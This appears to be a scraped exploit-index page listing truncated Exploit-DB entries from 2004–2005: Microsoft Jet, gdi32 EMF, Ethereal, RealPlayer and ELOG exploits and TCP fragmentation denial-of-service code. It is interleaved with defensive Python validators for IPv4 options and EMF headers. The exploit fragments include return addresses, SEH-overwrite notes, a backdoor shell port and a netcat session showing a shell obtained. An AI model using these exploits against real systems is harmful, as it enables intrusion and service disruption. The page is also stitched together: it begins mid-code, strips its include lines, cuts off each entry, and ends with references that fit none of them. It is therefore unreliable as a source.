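        number = t & 0x1f
        if number in ROUTE_OPTIONS:
            # type, length, pointer, then 4-byte addresses
            if ln < 3 or (ln - 3) % 4 != 0:
                issues.append(f"{ROUTE_OPTIONS[number]} at offset {i}: "
                              f"length {ln} is not 3 + 4k")
            elif opts[i + 2] < 4:
                issues.append(f"{ROUTE_OPTIONS[number]} at offset {i}: "
                              f"pointer {opts[i + 2]} < 4")
        i += ln
    return issues


def options_from_header(hdr: bytes) -> bytes:
    """Slice the options field out of a raw IPv4 header using IHL, after
    checking IHL against the bytes that are really there."""
    if len(hdr) < 20:
        raise ValueError("truncated IPv4 header")
    ihl = (hdr[0] & 0x0f) * 4
    if ihl < 20 or ihl > len(hdr):
        raise ValueError(f"IHL {ihl} inconsistent with {len(hdr)} bytes present")
    return hdr[20:ihl]


def advisory_options() -> bytes:
    """The options field from the Perl PoC above: type 3, length 0x27, 38 x 'G'."""
    return b"\x03\x27" + b"G" * 38


def _ip(a: str) -> bytes:
    return bytes(int(x) for x in a.split("."))


def constructed_header(opts: bytes, src="10.0.0.1", dst="10.0.0.2") -> bytes:
    """A minimal IPv4 header (checksum left zero) carrying `opts`; built
    for the demonstration, not taken from the PoC."""
    opts = opts + b"\x00" * (-len(opts) % 4)      # pad to a 32-bit boundary
    ihl = 5 + len(opts) // 4
    fixed = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, 20 + len(opts),
                        0, 0, 64, 6, 0, _ip(src), _ip(dst))
    return fixed + opts


if __name__ == "__main__":
    hdr = constructed_header(advisory_options())
    for issue in check_ipv4_options(options_from_header(hdr)):
        print("malformed:", issue)
    print("well-formed:", check_ipv4_options(b"\x83\x07\x04\x0a\x00\x00\x01\x00"))
```

On the PoC bytes the first option passes its own length check (39 bytes fit in 40), but the one byte left over is then read as a new option type with no room for a length byte, so the walker stops there instead of reading on. A 39-byte LSRR that fills the field cleanly is accepted; the point is that the declared length is checked against the remaining bytes at every step, not that 39 is a forbidden value.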
Exploit-DB
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
exploitdb·2005-04-11
CVE-2005-0944 Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow
---
/*
* --------------------------------------
*
* Microsoft Jet (msjet40.dll) Exploit
*
* --------------------------------------
*
* Author:
* ----------
* S.Pearson
* Computer Terrorism (UK)
* www.computerterrorism.com
* 11/04/2005
*
*
* Credits:
* ----------
* Hexview (original advisory)
*
*
* Tested on:
* -------------
* Windows 2000 SP4 (english)
* Windows XP SP0 (english)
* Windows XP SP1 (english)
*
*
* Requires:
* ------------
* MSAccess offset for stable jmp edx (could use others)
*
* 0x3005AD47 (Microsoft Access 2003)
* 0x300569F7 (Microsoft Access 2002) * DEFAULT *
* 0x3007F7FF (Microsoft Access 2000)
*
*
* Tech Overview:
* ------------------
* Simple exploit based upon Hexview's advisory
* released 01/04/2005.
*
Exploit-DB
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
exploitdb·2005-03-17
CVE-2005-0803 Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
---
source: https://www.securityfocus.com/bid/12834/info
Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files.
An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.
A hex dumped EMF file:
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 0
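The dump above is the start of an EMF file, and the 72 bytes that survive in the excerpt cover the EMR_HEADER fields an EMF consumer relies on when it sizes its buffers: record size, total file size, record count and the offset and length of the description string. As an added example, not part of the advisory and not a statement of gdi32's actual defect, here is a validator that decodes those fields (layout per MS-EMF) and cross-checks them against one another. The bytes are copied from the dump up to the point where the page's excerpt is cut off; the function names are mine.

```python
import struct

EMF_SIGNATURE = 0x464D4520                  # " EMF" read little-endian
HEADER_FMT = "<IIiiiiiiiiIIIIHHIII"         # first 72 bytes of EMR_HEADER
HEADER_FIELDS = ("type", "size",
                 "bounds_l", "bounds_t", "bounds_r", "bounds_b",
                 "frame_l", "frame_t", "frame_r", "frame_b",
                 "signature", "version", "n_bytes", "n_records",
                 "n_handles", "reserved", "n_description", "off_description",
                 "n_pal_entries")
MIN_HEADER_SIZE = 88                         # EMR_HEADER without extensions
MIN_RECORD_SIZE = 8                          # every record carries Type + Size

# Copied from the hex dump above, through offset 0x47 (where the excerpt stops).
EMF_DUMP = bytes.fromhex(
    "01000000 64000000 93000000 02000000"
    "83010000 39010000 00000000 00000000"
    "d1080000 be060000 20454d46 00000100"
    "78000000 17000000 03000000 0f000000"
    "64000000 41000000"
)


def parse_emf_header(data: bytes) -> dict:
    """Decode the leading EMR_HEADER fields; raise if even those are missing."""
    need = struct.calcsize(HEADER_FMT)
    if len(data) < need:
        raise ValueError(f"need {need} bytes for EMR_HEADER, got {len(data)}")
    return dict(zip(HEADER_FIELDS, struct.unpack_from(HEADER_FMT, data)))


def check_emf_header(data: bytes) -> list:
    """Return the inconsistencies between header fields that a consumer
    would hit if it trusted them for buffer sizing (empty = consistent)."""
    h = parse_emf_header(data)
    issues = []
    if h["signature"] != EMF_SIGNATURE:
        issues.append(f"bad signature 0x{h['signature']:08x}")
    if h["type"] != 1:
        issues.append(f"first record type {h['type']} is not EMR_HEADER")
    if h["size"] < MIN_HEADER_SIZE or h["size"] % 4:
        issues.append(f"header record size {h['size']} invalid")
    if h["n_bytes"] < h["size"]:
        issues.append(f"file size {h['n_bytes']} smaller than header {h['size']}")
    # Description: n_description UTF-16 code units at off_description, which
    # must lie inside the file the header itself claims to describe.
    desc_end = h["off_description"] + 2 * h["n_description"]
    if h["n_description"] and desc_end > h["n_bytes"]:
        issues.append(f"description ends at {desc_end}, past n_bytes {h['n_bytes']}")
    # Records: the header plus (n_records - 1) further records of >= 8 bytes.
    min_total = h["size"] + MIN_RECORD_SIZE * (h["n_records"] - 1)
    if h["n_records"] < 1 or min_total > h["n_bytes"]:
        issues.append(f"{h['n_records']} records need >= {min_total} bytes, "
                      f"n_bytes is {h['n_bytes']}")
    return issues


def with_fields(data: bytes, **fields) -> bytes:
    """Copy of `data` with the named header fields overwritten (for tests)."""
    buf = bytearray(data)
    for name, value in fields.items():
        idx = HEADER_FIELDS.index(name)
        off = struct.calcsize("<" + HEADER_FMT[1:idx + 1])
        struct.pack_into("<" + HEADER_FMT[idx + 1], buf, off, value)
    return bytes(buf)


if __name__ == "__main__":
    hdr = parse_emf_header(EMF_DUMP)
    print(f"size={hdr['size']} n_bytes={hdr['n_bytes']} n_records={hdr['n_records']} "
          f"n_description={hdr['n_description']} off_description={hdr['off_description']}")
    for issue in check_emf_header(EMF_DUMP):
        print("inconsistent:", issue)
```

Run on the page's bytes, the header says the whole file is 120 bytes (nBytes = 0x78) while also claiming a 15-character description at offset 100 and 23 records after a 100-byte header; neither fits in 120 bytes. Whether either inconsistency is what gdi32 trips over is not something this excerpt establishes, but a parser that does these cross-checks before copying never reaches the copy.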
Exploit-DB
Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
exploitdb·2005-03-12
CVE-2005-0739 Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow
---
/*
*
* Ethereal IAPP remote buffer overflow #2 PoC exploit
* ---------------------------------------------------
* To test this vulnerability on windows, try to send 3-10 packets
* that will trigger the crash, and scroll between captured packets
* in Ethereal.
*
* Coded by Leon Juranic
* LSS Security
*
*/
#include <winsock2.h>   /* header names were stripped in extraction; these two are restored from the WSADATA/sockaddr_in use below */
#include <stdio.h>
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0
typedef struct _e_iapphdr {
unsigned char ia_version;
unsigned char ia_type;
} e_iapphdr;
typedef struct _e_pduhdr {
unsigned char pdu_type;
unsigned char pdu_len_h;
unsigned char pdu_len_l;
} e_pduhdr;
void xp_sendpacket (char *pack)
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
int sock,i;
struct sockaddr_in sin;
unsigned char buf[2000]
Exploit-DB
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
exploitdb·2005-03-07
CVE-2005-0455 RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
---
/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Real\RealPlayer>
*/
#include
#include
#include
char pre[]=
"\n"
" \n"
" \n"
" \n"
" \n"
" \n"
" \n"
" "
"";
char ove
Exploit-DB
ELOG 2.5.6 - Remote Shell
exploitdb·2005-02-09
CVE-2005-0439 ELOG 2.5.6 - Remote Shell
ELOG 2.5.6 - Remote Shell
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/***
ROSE attack (
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/*-----------------
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/***
ROSE attack (c
Exploit-DB
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
exploitdb·2004-09-27
CVE-2005-4316 Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)
---
// source: https://www.securityfocus.com/bid/11258/info
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
A remote attacker may exploit this vulnerability to deny service to an affected computer.
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
/*----------------
No writeups or analysis indexed.
References
http://marc.info/?l=bugtraq&m=111885787217807&w=2
http://www.gulftech.org/?node=research&article_id=00082-06142005
http://www.phparena.net/
http://www.phparena.net/pafiledb_patch/
2005-06-15
Published